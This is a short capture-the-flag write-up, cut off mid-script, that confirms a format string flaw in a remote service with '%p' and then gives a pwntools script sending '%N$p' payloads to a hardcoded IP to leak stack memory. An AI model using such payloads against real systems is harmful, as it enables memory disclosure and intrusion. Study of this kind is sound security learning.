Tags: pwn
Rating:
After connect, try check Format String vulnerability:
> eat sleep pwn repeat!
>
> pwn >
>
> %p
>
> repeat >
>
> 0x7ffff7dd59e0
Ok, its work! Lets read memory use next script:
```python
#!/usr/bin/python
from pwn import *
import binascii
import struct
host = '139.59.13.232'
port = 3200
txt = ''
for x in [6, 7, 8]:
r = remote(host, port)
r.readuntil('pwn > \r\n')
payload = 'p'
r.sendline('%{x}${pl}\n'.format(x=x, pl=payload))
r.readuntil('repeat > \r\n')
data = r.readline().strip()
if '0x' in data:
txt += struct.pack('
